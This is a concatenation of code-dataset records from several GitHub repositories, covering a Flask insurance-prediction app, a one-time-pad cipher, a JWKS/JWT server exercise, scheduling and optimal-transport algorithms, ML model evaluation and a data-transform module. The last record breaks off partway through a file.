ax.plot(x_data, prediction_value, 'r-', lw=5)\n\t\t\t# #暂停0.1秒\n\t\t\t# plt.pause(0.1)\n\n\t\t\t# print sess.run(loss,feed_dict={x_input:x_data,y_input:y_data})\n\n\n\n","repo_name":"ItVen/MyTensorflow","sub_path":"demo/test_add_layer.py","file_name":"test_add_layer.py","file_ext":"py","file_size_in_byte":4206,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71586028705","text":"import json\nfrom flask import 
Flask,Flask,render_template,request,jsonify, url_for\nimport numpy as np\nimport pandas as pd\nimport pickle\n\nproject_app = Flask(__name__)\n\n@project_app.route('/')\ndef index():\n return render_template('project_front.html')\n\n@project_app.route('/user_data',methods = ['POST'])\ndef getting_data():\n data = request.form\n user_name = data['n1']\n user_email = data['e1']\n user_gender = data['G1']\n user_state = data['s1']\n user_age = data['a1']\n user_bmi = float(data['b1'])\n user_childern = data['o1']\n user_smoke = data['y1']\n \n\n data = np.array([user_age,user_gender,user_bmi,user_childern,user_smoke],ndmin=2)\n # age\tsex\tbmi\tchildren\tsmoker\tregion\t\n with open('final_modle.pkl','rb') as file:\n model_final = pickle.load(file)\n\n result_final = np.around(model_final.predict(data),3) \n \n return render_template('haha.html',name=user_name,em=user_email,st=user_state,gn=user_gender,ag=user_age,bm=user_bmi,ch=user_childern,res= result_final[0])\n\n\n\nif __name__ == '__main__':\n project_app.run(host='0.0.0.0',port=8080,debug = True) ","repo_name":"dev-suyash-k/Health_Insurance_Prediction","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"11949969055","text":"def find_min_days(prices, profit):\n string = []\n for k in profit:\n buyDate = -1\n sellDate = -1\n for i in enumerate(prices):\n if sellDate <= i[0] + 1 and sellDate != -1:\n break\n if (k + i[1]) in prices[(i[0] + 1):]:\n index = prices[(i[0] + 1):].index(k + i[1]) + i[0] + 1\n if buyDate != -1 and sellDate != -1:\n if index + 1 < sellDate or (index + 1 == sellDate and i[0] + 1 > buyDate):\n buyDate = i[0] + 1\n sellDate = index + 1\n else:\n buyDate = i[0] + 1\n sellDate = index + 1\n if buyDate == -1 and sellDate == -1:\n string.append(\"-1\")\n else:\n string.append(str(buyDate) + \" \" + str(sellDate))\n string.append(\",\")\n return \"\".join(string[:-1])\n\n\nn, d = map(int, input().split())\nprices = list(map(int, input().split()))\nprofit = list()\nfor i in range(d):\n profit.append(int(input().strip()))\nanswer = find_min_days(prices, profit)\nprint(answer)\n","repo_name":"JuliaSzymanska/Global-Coding-Challange-2020","sub_path":"Question_3/Python/Question3.py","file_name":"Question3.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"14374339716","text":"class OneTimePad():\n\n def __init__(self, pad_numbers, plaintext, cipher_id, process):\n validated = self._validate_pad(pad_numbers,\n plaintext,\n cipher_id,\n process)\n self.error = validated['error']\n self.pad_numbers = validated['pad_numbers']\n\n def _validate_pad(self, pad_numbers, text, cipher_id, process):\n '''takes a user-supplied prospective one-time pad and determines its\n validity.\n Returns a dictionary with two keys, `error` and `pad_numbers`.\n If the pad is valid, error will be None and pad_numbers will be the\n values (None can be a valid value for pad_numbers).\n If the pad is invalid, error will be a description of the error and\n pad_numbers will be None\n '''\n # check if pad is blank\n if pad_numbers == '':\n error = None\n pad_numbers = None\n return {'error': error,\n 'pad_numbers': pad_numbers}\n\n # turn comma-separated into list of values\n pad_numbers = [num.strip() for num in pad_numbers.split(',')]\n\n # try to convert the list elements into ints\n try:\n pad_numbers = 
[int(element) for element in pad_numbers]\n except ValueError:\n error = 'Invalid characters in pad, should only contain ints'\n pad_numbers = None\n return {'error': error,\n 'pad_numbers': pad_numbers}\n\n # check the length is sufficient\n if process == 'e':\n min_length = self._required_pad_length(text, cipher_id)\n else:\n min_length = self._required_pad_length(text, cipher_id, False)\n\n if len(pad_numbers) < min_length:\n error = 'Too short, pad must be at least as long as plaintext'\n pad_numbers = None\n else:\n error = None\n return {'error': error,\n 'pad_numbers': pad_numbers}\n\n def apply_one_time_pad(self, plaintext, cipher, encrypt_mode=True):\n '''reads the object's valid one-time pad (array of ints, at least as\n long as the plaintext) and takes:\n - plaintext (the text that will have the pad applied);\n - cipher (the cipher object - needed to use the cipher functionality);\n - encrypt_mode (True if encrypting, False if decrypting)\n and then returns a new 'plaintext' with the\n pad applied (forward if encrypting, backward if decrypting)\n '''\n valid_characters_and_spaces = cipher._reduce_characters(plaintext)\n\n altered_plaintext = \"\"\n\n numchars = len(valid_characters_and_spaces)\n numvalid = len(cipher.VALID_CHARACTERS)\n\n for character_index in range(numchars):\n pad_index = self.pad_numbers[character_index]\n character = valid_characters_and_spaces[character_index].lower()\n if character in cipher.VALID_CHARACTERS:\n lookup_index = cipher.VALID_CHARACTERS.index(character)\n if encrypt_mode:\n offset_index = (lookup_index + pad_index) % numvalid\n else:\n offset_index = (lookup_index - pad_index) % numvalid\n altered_plaintext += cipher.VALID_CHARACTERS[offset_index]\n elif character in cipher.PASSTHROUGH_CHARACTERS:\n altered_plaintext += character\n\n return altered_plaintext\n\n def _required_pad_length(self, text, cipher_id, encrypt_mode=True):\n '''Determines the minimum required pad length for an algorithm'''\n if encrypt_mode:\n return len(text)\n else: # decrypt\n if cipher_id['name'] in ['ADFGVX', 'Polybius Square']:\n return (len(text) + 1) // 2\n else:\n return len(text)\n\n def __repr__(self):\n if self.error is not None:\n return \"Pad with Error: {}\".format(self.error)\n else:\n return \"Pad: {}\".format(self.pad_numbers)\n","repo_name":"Crossroadsman/treehouse-techdegree-python-project2","sub_path":"one_time_pad.py","file_name":"one_time_pad.py","file_ext":"py","file_size_in_byte":4079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"25847996863","text":"import datetime\nimport jwt\nimport base64\nfrom flask import Flask, jsonify, request\nfrom cryptography.hazmat.primitives.asymmetric import rsa\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.x509 import load_pem_x509_certificate\n\n# Initialize your Flask app\napp = Flask(__name__)\n\n# Load the private key from your private_key.pem file\nwith open(\"private_keys/private_key.pem\", \"rb\") as private_key_file:\n private_key_str = private_key_file.read()\n\nprivate_key = serialization.load_pem_private_key(\n private_key_str,\n password=None,\n backend=default_backend()\n)\n\n# Load the public key from your public_key.pem file\nwith open(\"python code/public_key.pem\", \"rb\") as public_key_file:\n public_key_str = public_key_file.read()\n\npublic_key = load_pem_x509_certificate(public_key_str, default_backend()).public_key()\n\n# Implement your 
RESTful JWKS endpoint\n@app.route(\"/.well-known/jwks.json\", methods=[\"GET\"])\ndef jwks():\n # Generate a JWKS response containing your public key\n jwks_response = {\n \"keys\": [\n {\n \"kid\": \"kid1\", # Updated with the actual key ID (kid)\n \"kty\": \"RSA\",\n \"use\": \"sig\",\n \"alg\": \"RS256\",\n \"n\": base64.urlsafe_b64encode(public_key.public_numbers().n.to_bytes(256, \"big\")).rstrip(b\"=\").decode(\"utf-8\"),\n \"e\": base64.urlsafe_b64encode(public_key.public_numbers().e.to_bytes(3, \"big\")).rstrip(b\"=\").decode(\"utf-8\")\n }\n ]\n }\n\n return jsonify(jwks_response)\n\n# Implement your /auth endpoint\n@app.route(\"/auth\", methods=[\"POST\"])\ndef authenticate():\n # Get the \"expired\" query parameter\n expired = request.args.get(\"expired\")\n\n if expired:\n # Sign a JWT with the expired private key and expiry\n expiration = datetime.datetime.utcnow() - datetime.timedelta(minutes=1)\n expiration_timestamp = int(expiration.timestamp())\n payload = {\n \"sub\": \"user123\", # Replace with the actual user identifier\n \"exp\": expiration_timestamp\n }\n token = jwt.encode(payload, private_key_str, algorithm=\"RS256\")\n else:\n # Sign a JWT with the current private key\n payload = {\n \"sub\": \"user123\", # Replace with the actual user identifier\n \"exp\": int((datetime.datetime.utcnow() + datetime.timedelta(minutes=30)).timestamp())\n }\n token = jwt.encode(payload, private_key_str, algorithm=\"RS256\")\n\n return jsonify({\"token\": token.decode(\"utf-8\")})\n\n# Run the Flask app on port 8080\nif __name__ == \"__main__\":\n app.run(port=8080)\n","repo_name":"huda13S/jwks-server","sub_path":"jwks_server.py","file_name":"jwks_server.py","file_ext":"py","file_size_in_byte":2649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} {"seq_id":"11577210782","text":"import copy\nimport math\n\nimport numpy\n\nimport makespan\nimport task_class\n\n\ndef extract_column(tasks, column_number):\n r_list = []\n for task in tasks:\n r_list.append(task.times[column_number])\n return r_list\n\n\ndef do_schrage(tasks):\n ready_tasks = []\n final_list = []\n unready_tasks = copy.deepcopy(tasks)\n t = min(extract_column(unready_tasks, 0))\n\n while ready_tasks or unready_tasks:\n while unready_tasks and min(extract_column(unready_tasks, 0)) <= t:\n j = numpy.argmin(extract_column(unready_tasks, 0))\n ready_tasks.append(unready_tasks.pop(j))\n if not ready_tasks:\n t = min(extract_column(unready_tasks, 0))\n else:\n j = numpy.argmax(extract_column(ready_tasks, 2))\n final_list.append(ready_tasks.pop(j))\n t += final_list[-1].times[1]\n return makespan.makespan(final_list), final_list\n\n\ndef do_schrage_pmtn(tasks):\n ready_tasks = []\n final_list = []\n unready_tasks = copy.deepcopy(tasks)\n t = 0\n c_max = 0\n q_l = math.inf\n task_l = task_class.Tasks([0, 0, q_l], -1)\n\n while ready_tasks or unready_tasks:\n while unready_tasks and min(extract_column(unready_tasks, 0)) <= t:\n j = numpy.argmin(extract_column(unready_tasks, 0))\n ready_tasks.append(unready_tasks.pop(j))\n if ready_tasks[-1].times[2] > task_l.times[2]:\n task_l.times[1] = t - ready_tasks[-1].times[0]\n t = ready_tasks[-1].times[0]\n if task_l.times[1] > 0:\n ready_tasks.append(task_l)\n if not ready_tasks:\n t = min(extract_column(unready_tasks, 0))\n else:\n j = numpy.argmax(extract_column(ready_tasks, 2))\n task_l = ready_tasks.pop(j)\n t += task_l.times[1]\n c_max = max(c_max, t + task_l.times[2])\n final_list.append(task_l)\n return c_max,
final_list\n","repo_name":"schullstel/SPD","sub_path":"Projekt_5/schrage.py","file_name":"schrage.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"23923302032","text":"\nimport time\nimport torch as th\n\ndef eval_dual(P, u, v, r, c):\n return P.sum() - 1 - (u * r).sum() - (v * c).sum()\n # return P.sum().log() - (u * r).sum() - (v * c).sum()\n\n\ndef round_altschuler(P, r, c):\n X = th.min(r / P.sum(-1), th.ones_like(r))\n X = th.stack([th.diag(X[_]) for _ in range(len(X))])\n P = th.bmm(X, P)\n\n Y = th.min(c / P.sum(-2), th.ones_like(c))\n Y = th.stack([th.diag(Y[_]) for _ in range(len(Y))])\n P = th.bmm(P, Y)\n\n err_r = r - P.sum(-1)\n err_c = c - P.sum(-2)\n P += th.bmm(err_r.unsqueeze(-1), err_c.unsqueeze(-2)) / err_r.norm(p=1, dim=-1, keepdim=True).unsqueeze(-1)\n\n return P\n\n\ndef dual_hessian(P, r_P, c_P):\n B, N, _ = P.size()\n H = th.zeros((B, 2 * N, 2 * N), device=P.device, dtype=P.dtype)\n # Fill the diagonal of H with the concatenation of the row and column sums of P\n H[:, :N, N:] = P\n H[:, N:, :N] = P.transpose(2, 1)\n H = th.diagonal_scatter(H, th.cat([r_P, c_P], dim=-1), dim1=-2, dim2=-1)\n\n return H\n\n\ndef secant_approx_wolfe(df, x0=0., x1=1., c1=1e-3, c2=0.5, max_iter=100):\n logs = {\"f\": {}, \"df\": {}}\n func_cnt = 0\n x1 = x1.item() if isinstance(x1, th.Tensor) else x1\n\n df0 = df(x0)\n df_x0 = df0.clone()\n logs[\"df\"][x0] = df0\n func_cnt += 1\n\n df_x1 = df(x1)\n logs[\"df\"][x1] = df_x1\n func_cnt += 1\n\n if (2 * c1 - 1) * df0 >= df_x1 >= c2 * df0:\n logs[\"func_cnt\"] = func_cnt\n return x1, logs\n\n while df_x1 < 0:\n x0 = x1\n x1 *= 2\n df_x1 = df(x1)\n func_cnt += 1\n logs[\"df\"][x1] = df_x1\n\n if df_x1.isnan():\n raise ValueError(\"NaN encountered.\")\n\n while True:\n x = (x0 * df_x1 - x1 * df_x0) / (df_x1 - df_x0)\n x = (x + (x0 + x1) / 2) / 2\n df_x = df(x)\n func_cnt += 1\n logs[\"df\"][x.item()] = df_x\n if df_x > 0:\n x1 = x\n df_x1 = df_x\n elif df_x < 0:\n x0 = x\n df_x0 = df_x\n\n if (2 * c1 - 1) * df0 >= df_x >= c2 * df0:\n break\n\n if func_cnt > max_iter:\n raise RuntimeError(\"Secant approximate Wolfe line search did not converge.\")\n\n logs[\"func_cnt\"] = func_cnt\n # print(\"Bisection took {:.6f} seconds and {}.\".format(time.time() - start_time, k))\n\n return x, logs\n","repo_name":"adaptive-agents-lab/MDOT-PNCG","sub_path":"utils/algorithmic.py","file_name":"algorithmic.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"3111358456","text":"# import libraries\nimport os\nimport sys\nimport warnings\nimport lightgbm\nimport numpy as np\nimport pandas\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.linear_model import ElasticNetCV\nfrom sklearn.linear_model import LassoLarsIC\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.linear_model import Ridge\nfrom sklearn.model_selection import KFold\nfrom sklearn.model_selection import cross_validate\nfrom sklearn.tree import DecisionTreeRegressor\n\n\nclass EvaluateMLModels:\n\n data = None\n n_jobs = None\n models = None\n scoring = None\n attr = None\n\n def __init__(self, data, attr, n_jobs=1):\n\n # requested mandatory parameters\n self.attr = attr\n\n self.data = data\n self.n_jobs = n_jobs\n\n # prepare models\n self.models = [\n ('LR', LinearRegression(n_jobs=self.n_jobs)),\n ('LassoLARS', LassoLarsIC()),\n ('Ridge', Ridge()),\n 
('ElasticNet', ElasticNetCV(n_jobs=self.n_jobs)),\n ('LightGBM', lightgbm.sklearn.LGBMRegressor(n_jobs=self.n_jobs)),\n ('CART', DecisionTreeRegressor()),\n ('RandomForest', RandomForestRegressor())\n ]\n\n # prepare scoring metrics\n self.scoring = ['r2', 'neg_mean_squared_error']\n\n def train_single_var(self, yvar):\n\n if not sys.warnoptions:\n warnings.simplefilter(\"ignore\")\n os.environ[\"PYTHONWARNINGS\"] = \"ignore\" # Also affect subprocesses\n\n # subset data\n comb_feat = self.attr + [yvar]\n sub_data = self.data[comb_feat]\n\n # setup X for training\n Xtr = sub_data.iloc[:, 0:len(self.attr)]\n\n # setup Y for training\n Ytr = sub_data.iloc[:, len(self.attr)]\n\n # setup 10-fold CV\n kf = KFold(n_splits=10, shuffle=True)\n\n # scores\n scores = []\n for name, model in self.models:\n\n # get cross validation scores\n sc = cross_validate(estimator=model, X=Xtr, y=Ytr, scoring=self.scoring, cv=kf, n_jobs=self.n_jobs)\n scores.append([name, np.mean(sc['test_r2']), np.mean(sc['test_neg_mean_squared_error'])])\n\n return pandas.DataFrame(scores, columns=['Name', 'R2', 'NegRMSE'])\n","repo_name":"tanash1983/AMPRO-HPCC","sub_path":"EvaluateMLModels.py","file_name":"EvaluateMLModels.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"41794394876","text":"\"\"\"\nModul mit Funktionen zur Berechnung und Umwandlung von Daten.\n\"\"\"\nimport numbers\nimport re\nfrom collections import Counter\nfrom datetime import datetime\nfrom pydoc import locate\nfrom random import randint\n\nfrom visuanalytics.analytics.control.procedures.step_data import StepData\nfrom visuanalytics.analytics.transform.calculate import CALCULATE_ACTIONS\nfrom visuanalytics.analytics.transform.util.key_utils import get_new_keys, get_new_key\nfrom visuanalytics.analytics.util.step_errors import TransformError, \\\n raise_step_error, StepKeyError\nfrom visuanalytics.analytics.util.step_pattern import data_insert_pattern, data_get_pattern\nfrom visuanalytics.analytics.util.step_utils import execute_type_option, execute_type_compare\nfrom visuanalytics.analytics.util.type_utils import get_type_func, register_type_func\nfrom visuanalytics.util import resources\n\nTRANSFORM_TYPES = {}\n\"\"\"Ein Dictionary bestehend aus allen Transform-Typ-Methoden. 
\"\"\"\n\n\n@raise_step_error(TransformError)\ndef transform(values: dict, data: StepData):\n \"\"\"Führt die unter `\"type\"` angegebene transform-Funktion als Schleife aus.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n :return:\n \"\"\"\n for transformation in values[\"transform\"]:\n transformation[\"_loop_states\"] = values.get(\"_loop_states\", {})\n\n trans_func = get_type_func(transformation, TRANSFORM_TYPES)\n\n trans_func(transformation, data)\n\n\ndef register_transform(func):\n \"\"\"Registriert die übergebene Funktion und versieht sie mit einem `\"try/except\"`-Block.\n Fügt eine Typ-Funktion dem Dictionary TRANSFORM_TYPES hinzu.\n\n :param func: die zu registrierende Funktion\n :return: Funktion mit try/except-Block\n \"\"\"\n return register_type_func(TRANSFORM_TYPES, TransformError, func)\n\n\n@register_transform\ndef transform_array(values: dict, data: StepData):\n \"\"\"Führt alle angegebenen `\"transform\"`-Funktionen für alle Werte eines Arrays aus.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n for _ in data.loop_array(data.get_data(values[\"array_key\"], values), values):\n transform(values, data)\n\n\n@register_transform\ndef transform_dict(values: dict, data: StepData):\n \"\"\"Führt alle angegebenen `\"transform\"`-Funktionen für alle Werte eines Dictionaries aus.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n filter = re.compile(values[\"filter_keys\"]) if \"filter_keys\" in values else None\n skip = re.compile(values[\"skip_keys\"]) if \"skip_keys\" in values else None\n\n for idx,_ in data.loop_dict(data.get_data(values[\"dict_key\"], values), values):\n if (filter and not filter.match(idx)) or (skip and skip.match(idx)):\n continue\n transform(values, data)\n\n\n@register_transform\ndef calculate(values: dict, data: StepData):\n \"\"\"Berechnet die angegebene `\"action\"`.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n action_func = get_type_func(values, CALCULATE_ACTIONS, \"action\")\n\n action_func(values, data)\n\n\n@register_transform\ndef select(values: dict, data: StepData):\n \"\"\"Entfernt alle Keys, die nicht in `\"relevant_keys\"` stehen aus dem Dictionary.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n root = values.get(\"_loop_states\", {}).get(\"_loop\", None)\n\n if root is None:\n # If root is data root\n old_root = dict(data.data)\n data.clear_data()\n root = data.data\n else:\n old_root = dict(root)\n root.clear()\n\n for key in values[\"relevant_keys\"]:\n try:\n data_insert_pattern(key, root, data_get_pattern(key, old_root))\n except:\n if values.get(\"ignore_errors\", False) is False:\n raise\n\n\n@register_transform\ndef delete(values: dict, data: StepData):\n \"\"\"\n Löscht die angegebenen Keys aus den daten\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n try:\n for idx, key in data.loop_key(values[\"keys\"], values):\n data.remove_data(key, values)\n except:\n pass\n\n\n@register_transform\ndef select_range(values: dict, data: StepData):\n \"\"\"Entfernt alle Werte aus `\"array_key\"`, die nicht in `\"range\"` sind.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n value_array = data.get_data(values[\"array_key\"], values)\n range_start = data.get_data(values.get(\"range_start\", 0), values, int)\n range_end = data.get_data(values[\"range_end\"], values, int)\n\n 
data.insert_data(values[\"array_key\"], value_array[range_start:range_end], values)\n\n\n@register_transform\ndef append(values: dict, data: StepData):\n \"\"\"Speichert den Wert unter `\"key\"` in einem Array.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n value = data.get_data(key, values)\n if values.get(\"new_key_type\", \"multiple\") != \"single\":\n new_key = values[\"new_keys\"][idx]\n else:\n new_key = values[\"new_keys\"][0]\n new_key_format = data.format(values.get(\"append_type\", \"list\"))\n\n try:\n result = data.get_data(new_key, values)\n except StepKeyError:\n if new_key_format == \"string\":\n data.insert_data(new_key, \"\", values)\n else:\n data.insert_data(new_key, [], values)\n\n result = data.get_data(new_key, values)\n\n if new_key_format == \"string\":\n result = result + data.format(values.get(\"delimiter\", \" \")) + value\n data.insert_data(new_key, result, values)\n else:\n result.append(value)\n\n\n@register_transform\ndef add_symbol(values: dict, data: StepData):\n \"\"\"Fügt ein Zeichen, Symbol, Wort oder einen Satz zu einem Wert hinzu.\n\n Fügt ein Zeichen, Symbol, Wort oder einen Satz zu einem Wert hinzu. Dieses kann sowohl vor als auch hinter dem Wert\n stehen, der mit `\"{_key}\"` eingefügt wird. Außerdem kann man so einen Wert kopieren und einem neuen Key zuweisen, wenn\n man in unter `\"pattern\"` nur `\"{_key}\"` einsetzt.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n new_key = get_new_keys(values, idx)\n\n new_values = data.format(values['pattern'], values)\n data.insert_data(new_key, new_values, values)\n\n\n@register_transform\ndef replace(values: dict, data: StepData):\n \"\"\"Ersetzt ein Zeichen, Symbol, Wort, einen Satz oder eine ganzen Text in einem String.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n value = str(data.get_data(key, values))\n new_key = get_new_keys(values, idx)\n\n new_value = value.replace(data.format(values[\"old_value\"], values),\n data.format(values[\"new_value\"], values),\n data.get_data(values.get(\"count\", -1), values, int))\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef seperator(values: dict, data: StepData):\n \"\"\"Fügt Trennzeichen in einen Integer hinzu.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n value = int(data.get_data(key, values))\n new_key = get_new_keys(values, idx)\n\n new_value = '{:,}'.format(value).replace(',', data.format(values[\"seperator\"], values))\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef translate(values: dict, data: StepData):\n \"\"\"Setzt den Wert eines Keys zu einem neuen Key als Wert für die JSON.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n value = str(data.get_data(key, values))\n new_key = get_new_keys(values, idx)\n translation = data.get_data(values[\"dict\"], values, dict)\n\n new_value = data.format(translation[value], values)\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef alias(values: dict, data: StepData):\n \"\"\"Erstzt einen Key durch einen neuen Key.\n\n :param values: Werte aus der 
JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n for key, new_key in zip(values[\"keys\"], values[\"new_keys\"]):\n value = data.get_data(key, values)\n new_key = data.format(new_key, values)\n\n data.insert_data(new_key, value, values)\n\n if not data.get_data(values.get(\"keep_old\", False), {}, bool):\n data.remove_data(key, values)\n\n\n@register_transform\ndef regex(values: dict, data: StepData):\n \"\"\"Führt `\"re.sub\"` für die angegebenen Felder aus.\n regex (suche nach dieser Expression, replace_by (ersetze Expression durch), value (String in dem ersetzt werden soll)\n\n Geht nur für regex ohne backslash \\\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n value = data.get_data(key, values)\n new_key = get_new_keys(values, idx)\n\n regex = data.format(values[\"regex\"], values)\n find = fr\"{regex}\"\n replace_by = data.format(values[\"replace_by\"], values)\n new_value = re.sub(find, replace_by, value)\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef date_format(values: dict, data: StepData):\n \"\"\"Ändert das Format des Datums und der Uhrzeit.\n\n Ändert das Format des Datums und der Uhrzeit, welches unter `\"given_format\"` angegeben wird, in ein gewünschtes\n anderes Format, welches unter `\"format\"` angegeben wird.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n value = data.get_data(key, values)\n given_format = data.format(values[\"given_format\"], values)\n date = datetime.strptime(value, given_format).date()\n new_key = get_new_keys(values, idx)\n zeropaded_off = data.get_data(values.get(\"zeropaded_off\", False), values, bool)\n if zeropaded_off:\n new_value = date.strftime(data.format(values[\"format\"], values)).lstrip(\"0\").replace(\" 0\", \" \")\n else:\n new_value = date.strftime(data.format(values[\"format\"], values))\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef timestamp(values: dict, data: StepData):\n \"\"\"Wandelt einen UNIX-Zeitstempel in ein anderes Format um.\n\n Wandelt einen UNIX-Zeitstempel in ein anderes Format um, welches unter `\"format\"` angegeben wird. Ist zeropaded_off\n true, so wird aus z.B. 
05 eine 5.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n value = data.get_data(key, values)\n date = datetime.fromtimestamp(value)\n new_key = get_new_keys(values, idx)\n zeropaded_off = data.get_data(values.get(\"zeropaded_off\", False), values, bool)\n if zeropaded_off:\n new_value = date.strftime(data.format(values[\"format\"], values)).lstrip(\"0\").replace(\" 0\", \" \")\n else:\n new_value = date.strftime(data.format(values[\"format\"], values))\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef date_weekday(values: dict, data: StepData):\n \"\"\"Wandelt das angegebene Datum in den jeweiligen Wochentag um.\n\n Wandelt das angegebene Datum, im unter `\"given_format\"` angegebenen Format, in den jeweiligen Wochentag um.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n day_weekday = {\n 0: \"Montag\",\n 1: \"Dienstag\",\n 2: \"Mittwoch\",\n 3: \"Donnerstag\",\n 4: \"Freitag\",\n 5: \"Samstag\",\n 6: \"Sonntag\"\n }\n for idx, key in data.loop_key(values[\"keys\"], values):\n value = data.get_data(values[\"keys\"][idx], values)\n given_format = data.format(values[\"given_format\"], values)\n date = datetime.strptime(value, given_format).date()\n new_key = get_new_keys(values, idx)\n\n new_value = day_weekday[date.weekday()]\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef date_now(values: dict, data: StepData):\n \"\"\"Generiert das heutige Datum und gibt es im gewünschten Format aus.\n\n Generiert das heutige Datum und gibt es im unter `\"format\"` angegebenen Format aus.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n new_key = values[\"new_key\"]\n value = datetime.now()\n zeropaded_off = data.get_data(values.get(\"zeropaded_off\", False), values, bool)\n if zeropaded_off:\n new_value = value.strftime(data.format(values[\"format\"], values)).lstrip(\"0\").replace(\" 0\", \" \")\n else:\n new_value = value.strftime(data.format(values[\"format\"], values))\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef wind_direction(values: dict, data: StepData):\n \"\"\"Wandelt einen String von Windrichtungen um.\n\n Funktion nur mit den wind_cdir_full-Werten aus der Weatherbit-API ausführbar.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n value = data.get_data(values[\"key\"], values)\n new_key = get_new_key(values)\n delimiter = data.format(values[\"delimiter\"], values)\n if value.find(delimiter) != -1:\n wind = value.split(delimiter)\n wind_1 = wind[0]\n wind_2 = wind[1]\n wind_dir_1 = data.format(values[\"dict\"][wind_1][\"0\"], values)\n wind_dir_2 = data.format(values[\"dict\"][wind_2][\"0\"], values)\n new_value = f\"{wind_dir_1}-{wind_dir_2}\"\n else:\n new_value = data.format(values[\"dict\"][value][\"1\"], values)\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef loop(values: dict, data: StepData):\n \"\"\"Durchläuft das angegebene Array und führt für jedes Element die angegebenen `\"transform\"`-Funktionen aus.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n loop_values = data.deep_format(values.get(\"values\", None), values=values)\n\n # if values is none use range\n if loop_values is None:\n start = data.get_data(values.get(\"range_start\", 0), values, int)\n stop = data.get_data(values[\"range_stop\"], values, int)\n 
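# range_stop ist exklusiv, wie bei Pythons range()\n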
loop_values = range(start, stop)\n\n for _ in data.loop_array(loop_values, values):\n transform(values, data)\n\n\n@register_transform\ndef add_data(values: dict, data: StepData):\n \"\"\"Fügt Daten zu einem neuen Key hinzu.\n\n Fügt die unter `\"data\"` angegebenen Daten zu einem neuen Key hinzu.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n for new_key in values[\"new_keys\"]:\n value = data.deep_format(values[\"data\"], values=values)\n data.insert_data(new_key, value, values)\n\n\n@register_transform\ndef copy(values: dict, data: StepData):\n \"\"\"Kopiert einen Wert zu einem neuen Key.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n new_key = get_new_keys(values, idx)\n new_value = data.get_data(key, values)\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef option(values: dict, data: StepData):\n \"\"\"Führt die aufgeführten `\"transform\"`-Funktionen aus, je nachdem ob ein bestimmter Wert `\"true\"` oder `\"false\"` ist.\n\n Wenn der Wert, der in `\"check\"` steht `\"true\"` ist, werden die `\"transform\"`-Funktionen ausgeführt,\n die unter `\"on_true\"` stehen.\n Wenn der Wert, der in `\"check\"` steht `\"false\"` ist, werden die `\"transform\"`-Funktionen ausgeführt,\n die unter `\"on_false\"` stehen.\n\n :param values: Werte aus der 